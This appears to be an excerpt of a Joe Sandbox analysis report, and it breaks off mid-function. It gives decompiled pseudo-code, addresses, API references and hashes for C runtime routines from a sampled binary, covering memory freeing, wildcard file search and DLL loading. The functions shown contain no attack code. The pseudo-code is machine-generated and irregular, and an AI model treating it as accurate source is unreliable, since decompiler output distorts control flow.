Opcode ID: b3c6d6edc4b8db2d481ed8eaeaf2d2a7c49c96079be160b7ac4474d10c4585d1
Instruction ID: 8aeaa6f3efca8ef42f79a4ab2284a05e5170d018e511ff9bfbb7f5a046cdaf8f
Opcode Fuzzy Hash: b3c6d6edc4b8db2d481ed8eaeaf2d2a7c49c96079be160b7ac4474d10c4585d1
Instruction Fuzzy Hash: EF81D3B2F8424EAFDF209F94C841AEF7BB9AF49750F190555E824B7251D635CC81CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00917915 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00917915(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x92c120; // 0x92c174
					if(_t23 != 0) {
						E0090F884(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x92c124; // 0x959a58
					if(_t24 != 0) {
						E0090F884(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x92c128; // 0x959a58
					if(_t25 != 0) {
						E0090F884(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x92c150; // 0x92c178
					if(_t26 != 0) {
						E0090F884(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x92c154; // 0x959a5c
					if(_t27 != 0) {
						return E0090F884(_t6);
					}
				}
				return _t6;
			}

0x0091791b
0x00917920
0x00917924
0x0091792a
0x0091792d
0x00917932
0x00917936
0x0091793c
0x0091793f
0x00917944
0x00917948
0x0091794e
0x00917951
0x00917956
0x0091795a
0x00917960
0x00917963
0x00917968
0x00917969
0x0091796c
0x00917972
0x00000000
0x0091797a
0x00917972
0x0091797d

APIs

_free.LIBCMT ref: 0091792D

Part of subcall function 0090F884: HeapFree.KERNEL32(00000000,00000000,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?), ref: 0090F89A
Part of subcall function 0090F884: GetLastError.KERNEL32(?,?,00917BB6,?,00000000,?,?,?,00917E59,?,00000007,?,?,0091834C,?,?), ref: 0090F8AC

_free.LIBCMT ref: 0091793F
_free.LIBCMT ref: 00917951
_free.LIBCMT ref: 00917963
_free.LIBCMT ref: 00917975

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dfc26f1abdec836dfd89ae4bd4cc706ad3c260118f04a518454edfd8ee06398b
Instruction ID: dbb282a54dc39e8883fa8fd3f53c4f4c5424dd5b7499c145255522a3268b81eb
Opcode Fuzzy Hash: dfc26f1abdec836dfd89ae4bd4cc706ad3c260118f04a518454edfd8ee06398b
Instruction Fuzzy Hash: 06F0967360C216AFC634DBA4F4C7D9EB3EDAA487607684915F449D7942D730FDC18AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00915DE5 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00915DE5(void* __esi, signed int* _a4, signed int _a8, intOrPtr _a12) {
				intOrPtr _v0;
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v72;
				intOrPtr* _v104;
				intOrPtr* _v108;
				intOrPtr _v112;
				signed int _v124;
				struct _WIN32_FIND_DATAW _v608;
				char _v609;
				intOrPtr* _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				union _FINDEX_INFO_LEVELS _v628;
				signed int _v632;
				union _FINDEX_INFO_LEVELS _v636;
				union _FINDEX_INFO_LEVELS _v640;
				signed int _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				union _FINDEX_INFO_LEVELS _v656;
				union _FINDEX_INFO_LEVELS _v660;
				union _FINDEX_INFO_LEVELS _v664;
				signed int _v668;
				union _FINDEX_INFO_LEVELS _v672;
				union _FINDEX_INFO_LEVELS _v676;
				intOrPtr _v724;
				void* __ebx;
				void* __edi;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t134;
				signed int _t139;
				signed int _t140;
				intOrPtr* _t150;
				signed int _t152;
				intOrPtr _t153;
				signed int _t157;
				signed int _t159;
				signed int _t164;
				signed int _t166;
				char _t168;
				signed char _t169;
				signed int _t175;
				union _FINDEX_INFO_LEVELS _t179;
				signed int _t185;
				union _FINDEX_INFO_LEVELS _t188;
				intOrPtr* _t196;
				signed int _t199;
				intOrPtr _t204;
				signed int _t206;
				signed int _t209;
				signed int _t211;
				signed int _t212;
				signed int _t213;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int* _t219;
				signed int _t222;
				void* _t225;
				union _FINDEX_INFO_LEVELS _t226;
				void* _t227;
				intOrPtr _t229;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				intOrPtr* _t239;
				signed int _t241;
				intOrPtr* _t244;
				signed int _t249;
				signed int _t255;
				signed int _t257;
				signed int _t263;
				intOrPtr* _t264;
				signed int _t272;
				signed int _t274;
				intOrPtr* _t275;
				void* _t277;
				signed int _t280;
				signed int _t283;
				signed int _t285;
				intOrPtr _t287;
				void* _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t299;
				void* _t300;
				void* _t301;
				signed int _t302;
				void* _t306;
				signed int _t307;
				void* _t308;
				void* _t309;
				void* _t310;
				signed int _t311;
				void* _t312;
				void* _t313;

				_t131 = _a8;
				_t309 = _t308 - 0x28;
				_push(__esi);
				_t317 = _t131;
				if(_t131 != 0) {
					_t292 = _a4;
					_t222 = 0;
					 *_t131 = 0;
					_t283 = 0;
					_t132 =  *_t292;
					_t232 = 0;
					_v608.cAlternateFileName = 0;
					_v40 = 0;
					_v36 = 0;
					__eflags = _t132;
					if(_t132 == 0) {
						L9:
						_v8 = _t222;
						_t134 = _t232 - _t283;
						_t293 = _t283;
						_v12 = _t293;
						_t271 = (_t134 >> 2) + 1;
						_t136 = _t134 + 3 >> 2;
						__eflags = _t232 - _t293;
						_v16 = (_t134 >> 2) + 1;
						asm("sbb esi, esi");
						_t295 =  !_t293 & _t134 + 0x00000003 >> 0x00000002;
						__eflags = _t295;
						if(_t295 != 0) {
							_t213 = _t283;
							_t280 = _t222;
							do {
								_t264 =  *_t213;
								_t20 = _t264 + 1; // 0x1
								_v20 = _t20;
								do {
									_t215 =  *_t264;
									_t264 = _t264 + 1;
									__eflags = _t215;
								} while (_t215 != 0);
								_t222 = _t222 + 1 + _t264 - _v20;
								_t213 = _v12 + 4;
								_t280 = _t280 + 1;
								_v12 = _t213;
								__eflags = _t280 - _t295;
							} while (_t280 != _t295);
							_t271 = _v16;
							_v8 = _t222;
							_t222 = 0;
							__eflags = 0;
						}
						_t296 = E0090C68F(_t136, _t271, _v8, 1);
						_t310 = _t309 + 0xc;
						__eflags = _t296;
						if(_t296 != 0) {
							_v12 = _t283;
							_t139 = _t296 + _v16 * 4;
							_t233 = _t139;
							_v28 = _t139;
							_t140 = _t283;
							_v16 = _t233;
							__eflags = _t140 - _v40;
							if(_t140 == _v40) {
								L24:
								_v12 = _t222;
								 *_a8 = _t296;
								_t297 = _t222;
								goto L25;
							} else {
								_t274 = _t296 - _t283;
								__eflags = _t274;
								_v32 = _t274;
								do {
									_t150 =  *_t140;
									_t275 = _t150;
									_v24 = _t150;
									_v20 = _t275 + 1;
									do {
										_t152 =  *_t275;
										_t275 = _t275 + 1;
										__eflags = _t152;
									} while (_t152 != 0);
									_t153 = _t275 - _v20 + 1;
									_push(_t153);
									_v20 = _t153;
									_t157 = E0091ADB3(_t233, _v28 - _t233 + _v8, _v24);
									_t310 = _t310 + 0x10;
									__eflags = _t157;
									if(_t157 != 0) {
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										_push(_t222);
										E00909AAF();
										asm("int3");
										_t306 = _t310;
										_push(_t233);
										_t239 = _v72;
										_t65 = _t239 + 1; // 0x1
										_t277 = _t65;
										do {
											_t159 =  *_t239;
											_t239 = _t239 + 1;
											__eflags = _t159;
										} while (_t159 != 0);
										_push(_t283);
										_t285 = _a8;
										_t241 = _t239 - _t277 + 1;
										_v12 = _t241;
										__eflags = _t241 -  !_t285;
										if(_t241 <=  !_t285) {
											_push(_t222);
											_push(_t296);
											_t68 = _t285 + 1; // 0x1
											_t225 = _t68 + _t241;
											_t300 = E00910679(_t225, 1);
											__eflags = _t285;
											if(_t285 == 0) {
												L40:
												_push(_v12);
												_t225 = _t225 - _t285;
												_t164 = E0091ADB3(_t300 + _t285, _t225, _v0);
												_t311 = _t310 + 0x10;
												__eflags = _t164;
												if(_t164 != 0) {
													goto L45;
												} else {
													_t229 = _a12;
													_t206 = E00916318(_t229);
													_v12 = _t206;
													__eflags = _t206;
													if(_t206 == 0) {
														 *( *(_t229 + 4)) = _t300;
														_t302 = 0;
														_t77 = _t229 + 4;
														 *_t77 =  *(_t229 + 4) + 4;
														__eflags =  *_t77;
													} else {
														E0090F884(_t300);
														_t302 = _v12;
													}
													E0090F884(0);
													_t209 = _t302;
													goto L37;
												}
											} else {
												_push(_t285);
												_t211 = E0091ADB3(_t300, _t225, _a4);
												_t311 = _t310 + 0x10;
												__eflags = _t211;
												if(_t211 != 0) {
													L45:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00909AAF();
													asm("int3");
													_push(_t306);
													_t307 = _t311;
													_t312 = _t311 - 0x298;
													_t166 =  *0x92c014; // 0xb29a853a
													_v124 = _t166 ^ _t307;
													_t244 = _v108;
													_t278 = _v104;
													_push(_t225);
													_push(0);
													_t287 = _v112;
													_v724 = _t278;
													__eflags = _t244 - _t287;
													if(_t244 != _t287) {
														while(1) {
															_t204 =  *_t244;
															__eflags = _t204 - 0x2f;
															if(_t204 == 0x2f) {
																break;
															}
															__eflags = _t204 - 0x5c;
															if(_t204 != 0x5c) {
																__eflags = _t204 - 0x3a;
																if(_t204 != 0x3a) {
																	_t244 = E0091B4D0(_t287, _t244);
																	__eflags = _t244 - _t287;
																	if(_t244 != _t287) {
																		continue;
																	}
																}
															}
															break;
														}
														_t278 = _v616;
													}
													_t168 =  *_t244;
													_v609 = _t168;
													__eflags = _t168 - 0x3a;
													if(_t168 != 0x3a) {
														L56:
														_t226 = 0;
														__eflags = _t168 - 0x2f;
														if(__eflags == 0) {
															L59:
															_t169 = 1;
														} else {
															__eflags = _t168 - 0x5c;
															if(__eflags == 0) {
																goto L59;
															} else {
																__eflags = _t168 - 0x3a;
																_t169 = 0;
																if(__eflags == 0) {
																	goto L59;
																}
															}
														}
														_v676 = _t226;
														_v672 = _t226;
														_push(_t300);
														asm("sbb eax, eax");
														_v668 = _t226;
														_v664 = _t226;
														_v644 =  ~(_t169 & 0x000000ff) & _t244 - _t287 + 0x00000001;
														_v660 = _t226;
														_v656 = _t226;
														_t175 = E0090C11B(_t244 - _t287 + 1, _t287,  &_v676, E00915B3A(_t278, __eflags));
														_t313 = _t312 + 0xc;
														asm("sbb eax, eax");
														_t179 = FindFirstFileExW( !( ~_t175) & _v668, _t226,  &_v608, _t226, _t226, _t226);
														_t301 = _t179;
														__eflags = _t301 - 0xffffffff;
														if(_t301 != 0xffffffff) {
															_t249 =  *((intOrPtr*)(_v616 + 4)) -  *_v616;
															__eflags = _t249;
															_v648 = _t249 >> 2;
															do {
																_v640 = _t226;
																_v636 = _t226;
																_v632 = _t226;
																_v628 = _t226;
																_v624 = _t226;
																_v620 = _t226;
																_t185 = E00915D16( &(_v608.cFileName),  &_v640,  &_v609, E00915B3A(_t278, __eflags));
																_t313 = _t313 + 0x10;
																asm("sbb eax, eax");
																_t188 =  !( ~_t185) & _v632;
																__eflags =  *_t188 - 0x2e;
																if( *_t188 != 0x2e) {
																	L67:
																	_push(_v616);
																	_push(_v644);
																	_push(_t287);
																	_push(_t188);
																	L33();
																	_t313 = _t313 + 0x10;
																	_v652 = _t188;
																	__eflags = _t188;
																	if(_t188 != 0) {
																		__eflags = _v620 - _t226;
																		if(_v620 != _t226) {
																			E0090F884(_v632);
																			_t188 = _v652;
																		}
																		_t226 = _t188;
																	} else {
																		goto L68;
																	}
																} else {
																	_t255 =  *((intOrPtr*)(_t188 + 1));
																	__eflags = _t255;
																	if(_t255 == 0) {
																		goto L68;
																	} else {
																		__eflags = _t255 - 0x2e;
																		if(_t255 != 0x2e) {
																			goto L67;
																		} else {
																			__eflags =  *((intOrPtr*)(_t188 + 2)) - _t226;
																			if( *((intOrPtr*)(_t188 + 2)) == _t226) {
																				goto L68;
																			} else {
																				goto L67;
																			}
																		}
																	}
																}
																L76:
																FindClose(_t301);
																goto L77;
																L68:
																__eflags = _v620 - _t226;
																if(_v620 != _t226) {
																	E0090F884(_v632);
																}
																__eflags = FindNextFileW(_t301,  &_v608);
															} while (__eflags != 0);
															_t196 = _v616;
															_t257 = _v648;
															_t278 =  *_t196;
															_t199 =  *((intOrPtr*)(_t196 + 4)) -  *_t196 >> 2;
															__eflags = _t257 - _t199;
															if(_t257 != _t199) {
																E0091AFA0(_t278, _t278 + _t257 * 4, _t199 - _t257, 4, E00915CFE);
															}
															goto L76;
														} else {
															_push(_v616);
															_push(_t226);
															_push(_t226);
															_push(_t287);
															L33();
															_t226 = _t179;
														}
														L77:
														__eflags = _v656;
														_pop(_t300);
														if(_v656 != 0) {
															E0090F884(_v668);
														}
														_t190 = _t226;
													} else {
														_t190 = _t287 + 1;
														__eflags = _t244 - _t287 + 1;
														if(_t244 == _t287 + 1) {
															_t168 = _v609;
															goto L56;
														} else {
															_push(_t278);
															_push(0);
															_push(0);
															_push(_t287);
															L33();
														}
													}
													_pop(_t288);
													__eflags = _v16 ^ _t307;
													_pop(_t227);
													return E0090528B(_t190, _t227, _v16 ^ _t307, _t278, _t288, _t300);
												} else {
													goto L40;
												}
											}
										} else {
											_t209 = 0xc;
											L37:
											return _t209;
										}
									} else {
										goto L23;
									}
									goto L81;
									L23:
									_t212 = _v12;
									_t263 = _v16;
									 *((intOrPtr*)(_v32 + _t212)) = _t263;
									_t140 = _t212 + 4;
									_t233 = _t263 + _v20;
									_v16 = _t233;
									_v12 = _t140;
									__eflags = _t140 - _v40;
								} while (_t140 != _v40);
								goto L24;
							}
						} else {
							_t297 = _t296 | 0xffffffff;
							_v12 = _t297;
							L25:
							E0090F884(_t222);
							_pop(_t234);
							goto L26;
						}
					} else {
						while(1) {
							_v8 = 0x3f2a;
							_v6 = _t222;
							_t217 = E0091B490(_t132,  &_v8);
							_t234 =  *_t292;
							__eflags = _t217;
							if(_t217 != 0) {
								_push( &(_v608.cAlternateFileName));
								_push(_t217);
								_push(_t234);
								L46();
								_t309 = _t309 + 0xc;
								_v12 = _t217;
								_t297 = _t217;
							} else {
								_t218 =  &(_v608.cAlternateFileName);
								_push(_t218);
								_push(_t222);
								_push(_t222);
								_push(_t234);
								L33();
								_t297 = _t218;
								_t309 = _t309 + 0x10;
								_v12 = _t297;
							}
							__eflags = _t297;
							if(_t297 != 0) {
								break;
							}
							_t292 =  &(_a4[1]);
							_a4 = _t292;
							_t132 =  *_t292;
							__eflags = _t132;
							if(_t132 != 0) {
								continue;
							} else {
								_t283 = _v608.cAlternateFileName;
								_t232 = _v40;
								goto L9;
							}
							goto L81;
						}
						_t283 = _v608.cAlternateFileName;
						L26:
						_t272 = _t283;
						_v32 = _t272;
						__eflags = _v40 - _t272;
						asm("sbb ecx, ecx");
						_t236 =  !_t234 & _v40 - _t272 + 0x00000003 >> 0x00000002;
						__eflags = _t236;
						_v28 = _t236;
						if(_t236 != 0) {
							_t299 = _t236;
							do {
								E0090F884( *_t283);
								_t222 = _t222 + 1;
								_t283 = _t283 + 4;
								__eflags = _t222 - _t299;
							} while (_t222 != _t299);
							_t283 = _v608.cAlternateFileName;
							_t297 = _v12;
						}
						E0090F884(_t283);
						goto L31;
					}
				} else {
					_t219 = E00909B5C(_t317);
					_t297 = 0x16;
					 *_t219 = _t297;
					E00909A82();
					L31:
					return _t297;
				}
				L81:
			}

0x00915dea
0x00915ded
0x00915df0
0x00915df1
0x00915df3
0x00915e09
0x00915e0d
0x00915e10
0x00915e12
0x00915e14
0x00915e16
0x00915e18
0x00915e1b
0x00915e1e
0x00915e21
0x00915e23
0x00915e86
0x00915e88
0x00915e8b
0x00915e8d
0x00915e91
0x00915e9a
0x00915e9b
0x00915e9e
0x00915ea0
0x00915ea3
0x00915ea7
0x00915ea7
0x00915ea9
0x00915eab
0x00915ead
0x00915eaf
0x00915eaf
0x00915eb1
0x00915eb4
0x00915eb7
0x00915eb7
0x00915eb9
0x00915eba
0x00915eba
0x00915ec5
0x00915ec7
0x00915eca
0x00915ecb
0x00915ece
0x00915ece
0x00915ed2
0x00915ed5
0x00915ed8
0x00915ed8
0x00915ed8
0x00915ee5
0x00915ee7
0x00915eea
0x00915eec
0x00915f04
0x00915f07
0x00915f0a
0x00915f0c
0x00915f0f
0x00915f11
0x00915f14
0x00915f17
0x00915f74
0x00915f77
0x00915f7a
0x00915f7c
0x00000000
0x00915f19
0x00915f1b
0x00915f1b
0x00915f1d
0x00915f20
0x00915f20
0x00915f22
0x00915f24
0x00915f2a
0x00915f2d
0x00915f2d
0x00915f2f
0x00915f30
0x00915f30
0x00915f37
0x00915f3a
0x00915f3e
0x00915f4b
0x00915f50
0x00915f53
0x00915f55
0x00915fc9
0x00915fca
0x00915fcb
0x00915fcc
0x00915fcd
0x00915fce
0x00915fd3
0x00915fd7
0x00915fd9
0x00915fda
0x00915fdd
0x00915fdd
0x00915fe0
0x00915fe0
0x00915fe2
0x00915fe3
0x00915fe3
0x00915fe7
0x00915fe8
0x00915fef
0x00915ff2
0x00915ff5
0x00915ff7
0x00915fff
0x00916000
0x00916001
0x00916004
0x0091600e
0x00916012
0x00916014
0x00916028
0x00916028
0x0091602b
0x00916035
0x0091603a
0x0091603d
0x0091603f
0x00000000
0x00916041
0x00916041
0x00916046
0x0091604d
0x00916050
0x00916052
0x00916063
0x00916065
0x00916067
0x00916067
0x00916067
0x00916054
0x00916055
0x0091605a
0x0091605d
0x0091606c
0x00916072
0x00000000
0x00916075
0x00916016
0x00916016
0x0091601c
0x00916021
0x00916024
0x00916026
0x00916078
0x0091607a
0x0091607b
0x0091607c
0x0091607d
0x0091607e
0x0091607f
0x00916084
0x00916087
0x00916088
0x0091608a
0x00916090
0x00916097
0x0091609a
0x0091609d
0x009160a0
0x009160a1
0x009160a2
0x009160a5
0x009160ab
0x009160ad
0x009160af
0x009160af
0x009160b1
0x009160b3
0x00000000
0x00000000
0x009160b5
0x009160b7
0x009160b9
0x009160bb
0x009160c6
0x009160c8
0x009160ca
0x00000000
0x00000000
0x009160ca
0x009160bb
0x00000000
0x009160b7
0x009160cc
0x009160cc
0x009160d2
0x009160d4
0x009160da
0x009160dc
0x009160fe
0x009160fe
0x00916100
0x00916102
0x0091610e
0x0091610e
0x00916104
0x00916104
0x00916106
0x00000000
0x00916108
0x00916108
0x0091610a
0x0091610c
0x00000000
0x00000000
0x0091610c
0x00916106
0x00916116
0x0091611e
0x00916124
0x00916125
0x00916127
0x0091612f
0x00916135
0x0091613b
0x00916141
0x00916155
0x0091615a
0x00916165
0x00916175
0x0091617b
0x0091617d
0x00916180
0x009161a3
0x009161a3
0x009161a8
0x009161ae
0x009161ae
0x009161b4
0x009161ba
0x009161c0
0x009161c6
0x009161cc
0x009161ed
0x009161f2
0x009161f7
0x009161fb
0x00916201
0x00916204
0x00916217
0x00916217
0x0091621d
0x00916223
0x00916224
0x00916225
0x0091622a
0x0091622d
0x00916233
0x00916235
0x00916293
0x00916299
0x009162a1
0x009162a6
0x009162ac
0x009162ad
0x00000000
0x00000000
0x00000000
0x00916206
0x00916206
0x00916209
0x0091620b
0x00000000
0x0091620d
0x0091620d
0x00916210
0x00000000
0x00916212
0x00916212
0x00916215
0x00000000
0x00000000
0x00000000
0x00000000
0x00916215
0x00916210
0x0091620b
0x009162af
0x009162b0
0x00000000
0x00916237
0x00916237
0x0091623d
0x00916245
0x0091624a
0x00916259
0x00916259
0x00916261
0x00916267
0x0091626d
0x00916274
0x00916277
0x00916279
0x00916289
0x0091628e
0x00000000
0x00916182
0x00916182
0x00916188
0x00916189
0x0091618a
0x0091618b
0x00916193
0x00916193
0x009162b6
0x009162b6
0x009162bd
0x009162be
0x009162c6
0x009162cb
0x009162cc
0x009160de
0x009160de
0x009160e1
0x009160e3
0x009160f8
0x00000000
0x009160e5
0x009160e5
0x009160e8
0x009160e9
0x009160ea
0x009160eb
0x009160f0
0x009160e3
0x009162d1
0x009162d2
0x009162d4
0x009162db
0x00000000
0x00000000
0x00000000
0x00916026
0x00915ff9
0x00915ffb
0x00915ffc
0x00915ffe
0x00915ffe
0x00000000
0x00000000
0x00000000
0x00000000
0x00915f57
0x00915f57
0x00915f5d
0x00915f60
0x00915f63
0x00915f66
0x00915f69
0x00915f6c
0x00915f6f
0x00915f6f
0x00000000
0x00915f20
0x00915eee
0x00915eee
0x00915ef1
0x00915f7e
0x00915f7f
0x00915f84
0x00000000
0x00915f84
0x00915e25
0x00915e25
0x00915e28
0x00915e30
0x00915e33
0x00915e3a
0x00915e3c
0x00915e3e
0x00915e59
0x00915e5a
0x00915e5b
0x00915e5c
0x00915e61
0x00915e64
0x00915e67
0x00915e40
0x00915e40
0x00915e43
0x00915e44
0x00915e45
0x00915e46
0x00915e47
0x00915e4c
0x00915e4e
0x00915e51
0x00915e51
0x00915e69
0x00915e6b
0x00000000
0x00000000
0x00915e74
0x00915e77
0x00915e7a
0x00915e7c
0x00915e7e
0x00000000
0x00915e80
0x00915e80
0x00915e83
0x00000000
0x00915e83
0x00000000
0x00915e7e
0x00915ef9
0x00915f85
0x00915f88
0x00915f8c
0x00915f95
0x00915f98
0x00915f9c
0x00915f9c
0x00915f9e
0x00915fa1
0x00915fa3
0x00915fa5
0x00915fa7
0x00915fac
0x00915fad
0x00915fb1
0x00915fb1
0x00915fb5
0x00915fb8
0x00915fb8
0x00915fbc
0x00000000
0x00915fc3
0x00915df5
0x00915df5
0x00915dfc
0x00915dfd
0x00915dff
0x00915fc4
0x00915fc8
0x00915fc8
0x00000000

APIs

_free.LIBCMT ref: 00915F7F

Strings

*?, xrefs: 00915E28

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 9ab6da0878bf4187ceb5a84aa58037a55d19884fbd50e9066655e39af7d74d09
Instruction ID: efcac23572141b1e52d03004a9e99c777e356853a131318a0a8de46cf5111931
Opcode Fuzzy Hash: 9ab6da0878bf4187ceb5a84aa58037a55d19884fbd50e9066655e39af7d74d09
Instruction Fuzzy Hash: C8611F76E00619EFDB14DFA9C8815EDFBF9EF88310B16816AE815E7340D7359E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 009095D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E009095D2(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E0090F1C8(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x009095df
0x009095e7
0x0090961c
0x009095e9
0x009095f2
0x00000000
0x00909619
0x00909618
0x00909618

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00909583,00000000,?,0095987C,?,?,?,00909726,00000004,InitializeCriticalSectionEx,0091EB58,InitializeCriticalSectionEx), ref: 009095DF
GetLastError.KERNEL32(?,00909583,00000000,?,0095987C,?,?,?,00909726,00000004,InitializeCriticalSectionEx,0091EB58,InitializeCriticalSectionEx,00000000,?,009094DD), ref: 009095E9
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00909611

Strings

api-ms-, xrefs: 009095F6

Memory Dump Source

Source File: 00000001.00000002.290992540.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true

Associated: 00000001.00000002.290979740.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291303758.000000000091D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291738151.000000000092C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291908957.0000000000958000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291968781.0000000000959000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.291981514.000000000095A000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_900000_123.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 1103a96b079f0f5a796e3cc9a786a96a23a45a75624705eea13dc3ca120e1629
Instruction ID: 3b69f223b44e850b7a5c180ba3fda68db37fe138a7512cd9fb38e591569473fa
Opcode Fuzzy Hash: 1103a96b079f0f5a796e3cc9a786a96a23a45a75624705eea13dc3ca120e1629
Instruction Fuzzy Hash: 29E0BF30794209BBEF205B71EC46B9D3F5DAB44B58F148030F90CA84E2DBA2D961DA98

Uniqueness

Uniqueness Score: -1.00%

Function 009085A1 Relevance: 6.2, APIs: 4, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 64%

			E009085A1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x92a410);
				E009059D0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00905ED0(_t107, E00906B3C(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00905ED0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
